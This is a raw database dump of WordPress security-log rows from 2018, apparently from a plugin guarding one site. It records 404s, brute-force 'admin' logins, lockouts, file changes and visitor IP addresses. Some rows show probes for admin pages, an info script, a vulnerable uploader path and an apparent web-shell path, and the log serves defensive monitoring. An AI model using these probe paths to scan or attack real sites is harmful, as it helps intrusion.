(87034, 'four_oh_four', '404 Error', 3, '2018-05-03 03:58:32', '2018-05-03 08:58:32', '207.46.13.197', '', 0, '/global-belief-relief/robots.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87035, 'four_oh_four', '404 Error', 3, '2018-05-03 04:20:21', '2018-05-03 09:20:21', '46.161.9.56', '', 0, '/express-the-operation-of-increase-of-the-business-11/', 'http://clearyourbeliefs.com/express-the-operation-of-increase-of-the-business-11/', 'a:1:{s:12:"query_string";s:0:"";}'),
(87036, 'four_oh_four', '404 Error', 3, '2018-05-03 04:21:09', '2018-05-03 09:21:09', '111.248.129.204', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2618";}'),
(87037, 'four_oh_four', '404 Error', 3, '2018-05-03 04:21:14', '2018-05-03 09:21:14', '111.248.129.204', '', 0, '/', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:6:"p=2618";}'),
(87038, 'four_oh_four', '404 Error', 3, '2018-05-03 04:22:35', '2018-05-03 09:22:35', '113.95.165.143', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(87039, 'four_oh_four', '404 Error', 3, '2018-05-03 04:22:36', '2018-05-03 09:22:36', '113.95.165.143', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(87040, 'four_oh_four', '404 Error', 3, '2018-05-03 04:25:43', '2018-05-03 09:25:43', '117.96.199.178', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87041, 'four_oh_four', '404 Error', 3, '2018-05-03 04:53:52', '2018-05-03 09:53:52', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87042, 'four_oh_four', '404 Error', 3, '2018-05-03 04:58:09', '2018-05-03 09:58:09', '188.217.48.231', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87043, 'four_oh_four', '404 Error', 3, '2018-05-03 05:05:29', '2018-05-03 10:05:29', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87044, 'four_oh_four', '404 Error', 3, '2018-05-03 05:12:51', '2018-05-03 10:12:51', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87045, 'four_oh_four', '404 Error', 3, '2018-05-03 05:17:04', '2018-05-03 10:17:04', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87046, 'four_oh_four', '404 Error', 3, '2018-05-03 05:17:05', '2018-05-03 10:17:05', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87047, 'four_oh_four', '404 Error', 3, '2018-05-03 05:17:08', '2018-05-03 10:17:08', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87048, 'four_oh_four', '404 Error', 3, '2018-05-03 05:17:08', '2018-05-03 10:17:08', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87049, 'four_oh_four', '404 Error', 3, '2018-05-03 05:32:03', '2018-05-03 10:32:03', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87050, 'four_oh_four', '404 Error', 3, '2018-05-03 06:31:09', '2018-05-03 11:31:09', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87051, 'four_oh_four', '404 Error', 3, '2018-05-03 06:58:34', '2018-05-03 11:58:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87052, 'four_oh_four', '404 Error', 3, '2018-05-03 06:58:34', '2018-05-03 11:58:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87053, 'four_oh_four', '404 Error', 3, '2018-05-03 06:58:37', '2018-05-03 11:58:37', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87054, 'four_oh_four', '404 Error', 3, '2018-05-03 06:58:38', '2018-05-03 11:58:38', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87055, 'four_oh_four', '404 Error', 3, '2018-05-03 07:22:15', '2018-05-03 12:22:15', '185.86.164.100', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87056, 'four_oh_four', '404 Error', 3, '2018-05-03 07:34:54', '2018-05-03 12:34:54', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87057, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', 'admin', 0, '', '', 'a:0:{}'),
(87058, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', 'admin', 0, '', '', 'a:0:{}'),
(87059, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', 'admin', 0, '', '', 'a:0:{}'),
(87060, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', 'admin', 0, '', '', 'a:0:{}'),
(87061, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', 'admin', 0, '', '', 'a:0:{}'),
(87062, 'lockout', 'Host or User Lockout', 10, '2018-05-03 08:07:44', '2018-05-03 13:07:44', '198.50.200.129', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-03 08:22:44";s:11:"expires_gmt";s:19:"2018-05-03 13:22:44";s:4:"type";s:11:"brute_force";}'),
(87063, 'four_oh_four', '404 Error', 3, '2018-05-03 08:16:31', '2018-05-03 13:16:31', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87064, 'four_oh_four', '404 Error', 3, '2018-05-03 08:16:31', '2018-05-03 13:16:31', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87065, 'four_oh_four', '404 Error', 3, '2018-05-03 08:16:34', '2018-05-03 13:16:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87066, 'four_oh_four', '404 Error', 3, '2018-05-03 08:16:35', '2018-05-03 13:16:35', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87067, 'four_oh_four', '404 Error', 3, '2018-05-03 08:27:26', '2018-05-03 13:27:26', '185.85.238.244', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87068, 'four_oh_four', '404 Error', 3, '2018-05-03 08:40:26', '2018-05-03 13:40:26', '46.161.9.71', '', 0, '/express-the-operation-of-increase-of-the-business-11/', 'http://clearyourbeliefs.com/express-the-operation-of-increase-of-the-business-11/', 'a:1:{s:12:"query_string";s:0:"";}'),
(87069, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:43', '2018-05-03 13:57:43', '65.19.167.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87070, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:44', '2018-05-03 13:57:44', '65.19.167.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87071, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:46', '2018-05-03 13:57:46', '65.19.167.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87072, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:49', '2018-05-03 13:57:49', '65.19.167.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87073, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:54', '2018-05-03 13:57:54', '195.254.134.194', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87074, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:55', '2018-05-03 13:57:55', '195.254.134.194', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87075, 'four_oh_four', '404 Error', 3, '2018-05-03 08:57:58', '2018-05-03 13:57:58', '195.254.134.194', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87076, 'four_oh_four', '404 Error', 3, '2018-05-03 08:58:00', '2018-05-03 13:58:00', '195.254.134.194', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87077, 'four_oh_four', '404 Error', 3, '2018-05-03 08:58:04', '2018-05-03 13:58:04', '192.160.102.170', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87078, 'four_oh_four', '404 Error', 3, '2018-05-03 08:58:05', '2018-05-03 13:58:05', '192.160.102.170', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87079, 'four_oh_four', '404 Error', 3, '2018-05-03 08:58:07', '2018-05-03 13:58:07', '192.160.102.170', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87080, 'four_oh_four', '404 Error', 3, '2018-05-03 08:58:09', '2018-05-03 13:58:09', '192.160.102.170', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87081, 'four_oh_four', '404 Error', 3, '2018-05-03 09:02:48', '2018-05-03 14:02:48', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87082, 'four_oh_four', '404 Error', 3, '2018-05-03 09:08:00', '2018-05-03 14:08:00', '185.86.164.107', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87083, 'four_oh_four', '404 Error', 3, '2018-05-03 09:22:55', '2018-05-03 14:22:55', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87084, 'four_oh_four', '404 Error', 3, '2018-05-03 10:13:56', '2018-05-03 15:13:56', '54.37.74.56', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87085, 'four_oh_four', '404 Error', 3, '2018-05-03 10:13:57', '2018-05-03 15:13:57', '54.37.74.56', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87086, 'four_oh_four', '404 Error', 3, '2018-05-03 10:13:59', '2018-05-03 15:13:59', '54.37.74.56', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87087, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:01', '2018-05-03 15:14:01', '54.37.74.56', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87088, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:07', '2018-05-03 15:14:07', '185.107.47.171', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87089, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:09', '2018-05-03 15:14:09', '185.107.47.171', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87090, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:11', '2018-05-03 15:14:11', '185.107.47.171', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87091, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:13', '2018-05-03 15:14:13', '185.107.47.171', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87092, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:19', '2018-05-03 15:14:19', '185.100.87.207', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87093, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:20', '2018-05-03 15:14:20', '185.100.87.207', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87094, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:23', '2018-05-03 15:14:23', '185.100.87.207', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87095, 'four_oh_four', '404 Error', 3, '2018-05-03 10:14:25', '2018-05-03 15:14:25', '185.100.87.207', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87096, 'four_oh_four', '404 Error', 3, '2018-05-03 10:28:41', '2018-05-03 15:28:41', '193.106.30.99', '', 0, '/phpinfoer.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87097, 'four_oh_four', '404 Error', 3, '2018-05-03 10:31:29', '2018-05-03 15:31:29', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87098, 'four_oh_four', '404 Error', 3, '2018-05-03 10:31:30', '2018-05-03 15:31:30', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87099, 'four_oh_four', '404 Error', 3, '2018-05-03 10:31:33', '2018-05-03 15:31:33', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87100, 'four_oh_four', '404 Error', 3, '2018-05-03 10:31:34', '2018-05-03 15:31:34', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87101, 'four_oh_four', '404 Error', 3, '2018-05-03 10:38:31', '2018-05-03 15:38:31', '193.106.30.99', '', 0, '/phpinfoer.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87102, 'four_oh_four', '404 Error', 3, '2018-05-03 11:05:18', '2018-05-03 16:05:18', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87103, 'four_oh_four', '404 Error', 3, '2018-05-03 11:14:38', '2018-05-03 16:14:38', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87104, 'four_oh_four', '404 Error', 3, '2018-05-03 11:36:50', '2018-05-03 16:36:50', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87105, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:10', '2018-05-03 16:39:10', '172.81.133.31', '', 0, '/WP/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87106, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:11', '2018-05-03 16:39:11', '172.81.133.31', '', 0, '/beta/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87107, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:13', '2018-05-03 16:39:13', '172.81.133.31', '', 0, '/blogs/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87108, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:15', '2018-05-03 16:39:15', '172.81.133.31', '', 0, '/cms/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87109, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:16', '2018-05-03 16:39:16', '172.81.133.31', '', 0, '/demo/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87110, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:18', '2018-05-03 16:39:18', '172.81.133.31', '', 0, '/home/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87111, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:20', '2018-05-03 16:39:20', '172.81.133.31', '', 0, '/new/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87112, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:22', '2018-05-03 16:39:22', '172.81.133.31', '', 0, '/news/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87113, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:24', '2018-05-03 16:39:24', '172.81.133.31', '', 0, '/portal/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87114, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:25', '2018-05-03 16:39:25', '172.81.133.31', '', 0, '/press/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87115, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:26', '2018-05-03 16:39:26', '172.81.133.31', '', 0, '/site/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87116, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:28', '2018-05-03 16:39:28', '172.81.133.31', '', 0, '/v1/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87117, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:30', '2018-05-03 16:39:30', '172.81.133.31', '', 0, '/v2/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87118, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:32', '2018-05-03 16:39:32', '172.81.133.31', '', 0, '/wordpress/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87119, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:33', '2018-05-03 16:39:33', '172.81.133.31', '', 0, '/wp/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87120, 'four_oh_four', '404 Error', 3, '2018-05-03 11:39:34', '2018-05-03 16:39:34', '172.81.133.31', '', 0, '/wp/test/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87121, 'four_oh_four', '404 Error', 3, '2018-05-03 12:06:56', '2018-05-03 17:06:56', '91.219.239.114', '', 0, '/global-belief-relief/OZloZ/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87122, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:10', '2018-05-03 17:15:10', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87123, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:11', '2018-05-03 17:15:11', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87124, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:13', '2018-05-03 17:15:13', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87125, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:14', '2018-05-03 17:15:14', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87126, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:16', '2018-05-03 17:15:16', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87127, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:17', '2018-05-03 17:15:17', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87128, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:20', '2018-05-03 17:15:20', '24.235.38.44', '', 0, '/apple-touch-icon-120x120-precomposed.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87129, 'four_oh_four', '404 Error', 3, '2018-05-03 12:15:21', '2018-05-03 17:15:21', '24.235.38.44', '', 0, '/apple-touch-icon-120x120.png', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87130, 'four_oh_four', '404 Error', 3, '2018-05-03 12:22:58', '2018-05-03 17:22:58', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87131, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:00', '2018-05-03 17:35:00', '185.86.164.101', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87132, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:12', '2018-05-03 17:35:12', '88.231.153.102', '', 0, '/administrator/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87133, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:14', '2018-05-03 17:35:14', '88.231.153.102', '', 0, '/admin.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87134, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:17', '2018-05-03 17:35:17', '88.231.153.102', '', 0, '/bitrix/admin/', '', 'a:1:{s:12:"query_string";s:7:"lang=en";}'),
(87135, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:19', '2018-05-03 17:35:19', '88.231.153.102', '', 0, '/admin/login.php', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87136, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:20', '2018-05-03 17:35:20', '88.231.153.102', '', 0, '/admin/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87137, 'four_oh_four', '404 Error', 3, '2018-05-03 12:35:22', '2018-05-03 17:35:22', '88.231.153.102', '', 0, '/user/', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87138, 'four_oh_four', '404 Error', 3, '2018-05-03 12:50:23', '2018-05-03 17:50:23', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/wp-login.php?action=register', 'a:1:{s:12:"query_string";s:0:"";}'),
(87139, 'four_oh_four', '404 Error', 3, '2018-05-03 12:50:24', '2018-05-03 17:50:24', '103.199.17.24', '', 0, '/not_found', 'http://clearyourbeliefs.com/not_found', 'a:1:{s:12:"query_string";s:15:"action=register";}'),
(87140, 'four_oh_four', '404 Error', 3, '2018-05-03 14:00:50', '2018-05-03 19:00:50', '185.86.164.102', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87141, 'four_oh_four', '404 Error', 3, '2018-05-03 14:01:31', '2018-05-03 19:01:31', '217.64.113.195', '', 0, '/not_found', 'http://clearyourbeliefs.com/', 'a:1:{s:12:"query_string";s:0:"";}'),
(87142, 'four_oh_four', '404 Error', 3, '2018-05-03 14:05:06', '2018-05-03 19:05:06', '185.86.164.99', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87143, 'four_oh_four', '404 Error', 3, '2018-05-03 14:34:29', '2018-05-03 19:34:29', '193.201.224.210', '', 0, '/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php', 'http://clearyourbeliefs.org/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(87144, 'four_oh_four', '404 Error', 3, '2018-05-03 14:34:34', '2018-05-03 19:34:34', '193.201.224.210', '', 0, '/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php', 'http://clearyourbeliefs.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php', 'a:1:{s:12:"query_string";s:0:"";}'),
(87145, 'four_oh_four', '404 Error', 3, '2018-05-03 15:06:34', '2018-05-03 20:06:34', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87146, 'four_oh_four', '404 Error', 3, '2018-05-03 15:14:31', '2018-05-03 20:14:31', '185.86.164.104', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87147, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(87148, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(87149, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(87150, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(87151, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', 'admin', 0, '', '', 'a:0:{}'),
(87152, 'lockout', 'Host or User Lockout', 10, '2018-05-03 16:17:02', '2018-05-03 21:17:02', '176.10.99.200', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-03 16:32:02";s:11:"expires_gmt";s:19:"2018-05-03 21:32:02";s:4:"type";s:11:"brute_force";}'),
(87153, 'file_change', 'File Changes Detected', 8, '2018-05-03 17:03:07', '2018-05-03 22:03:07', '', '', 0, '', '', 'a:4:{s:5:"added";a:0:{}s:7:"removed";a:1:{s:107:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_int_da3dd9c2c453b9ea3d036598abfb8e7d.timthumb.txt";a:2:{s:1:"d";s:10:"1525145126";s:1:"h";s:32:"3143ce3085b9cdcd92bd4c8754ec4daa";}}s:7:"changed";a:2:{s:59:"wp-content/plugins/ready-ecommerce/modules/cache/index.html";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525344867";}s:82:"wp-content/plugins/ready-ecommerce/modules/cache/timthumb_cacheLastCleanTime.touch";a:2:{s:1:"h";s:32:"d41d8cd98f00b204e9800998ecf8427e";s:1:"d";s:10:"1525344867";}}s:6:"memory";s:4:"39.4";}'),
(87154, 'four_oh_four', '404 Error', 3, '2018-05-03 18:52:20', '2018-05-03 23:52:20', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87155, 'four_oh_four', '404 Error', 3, '2018-05-03 20:15:09', '2018-05-04 01:15:09', '185.119.81.11', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87156, 'four_oh_four', '404 Error', 3, '2018-05-03 20:59:29', '2018-05-04 01:59:29', '185.86.164.106', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87157, 'four_oh_four', '404 Error', 3, '2018-05-03 21:03:11', '2018-05-04 02:03:11', '185.85.191.196', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87158, 'four_oh_four', '404 Error', 3, '2018-05-03 21:28:08', '2018-05-04 02:28:08', '185.86.164.109', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87159, 'four_oh_four', '404 Error', 3, '2018-05-03 21:42:57', '2018-05-04 02:42:57', '185.86.13.213', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87160, 'four_oh_four', '404 Error', 3, '2018-05-03 22:08:47', '2018-05-04 03:08:47', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87161, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', 'admin', 0, '', '', 'a:0:{}'),
(87162, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', 'admin', 0, '', '', 'a:0:{}'),
(87163, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', 'admin', 0, '', '', 'a:0:{}'),
(87164, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', 'admin', 0, '', '', 'a:0:{}'),
(87165, 'brute_force', 'Invalid Login Attempt', 5, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', 'admin', 0, '', '', 'a:0:{}'),
(87166, 'lockout', 'Host or User Lockout', 10, '2018-05-03 22:16:14', '2018-05-04 03:16:14', '195.176.3.24', '', 0, '', '', 'a:3:{s:7:"expires";s:19:"2018-05-03 22:31:14";s:11:"expires_gmt";s:19:"2018-05-04 03:31:14";s:4:"type";s:11:"brute_force";}'),
(87167, 'four_oh_four', '404 Error', 3, '2018-05-03 22:25:43', '2018-05-04 03:25:43', '185.85.239.110', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87168, 'four_oh_four', '404 Error', 3, '2018-05-04 00:30:17', '2018-05-04 05:30:17', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(87169, 'four_oh_four', '404 Error', 3, '2018-05-04 02:23:21', '2018-05-04 07:23:21', '185.85.191.201', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86317, 'four_oh_four', '404 Error', 3, '2018-04-28 19:41:03', '2018-04-29 00:41:03', '50.232.233.123', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86318, 'four_oh_four', '404 Error', 3, '2018-04-28 19:54:04', '2018-04-29 00:54:04', '185.85.190.132', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86319, 'four_oh_four', '404 Error', 3, '2018-04-28 19:57:37', '2018-04-29 00:57:37', '95.211.188.3', '', 0, '/wp-content/uploads/assignments/ch.php.', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86320, 'four_oh_four', '404 Error', 3, '2018-04-28 20:12:01', '2018-04-29 01:12:01', '66.249.69.102', '', 0, '/ads.txt', '', 'a:1:{s:12:"query_string";s:0:"";}'),
(86321, 'four_oh_four', '404 Error', 3, '2018-04-28 20:31:36', '2018-04-29 01:31:36', '185.119.81.50', '', 0, '/not_found', '', 'a:1:{s:12:"query_string";s:0:"";}'),
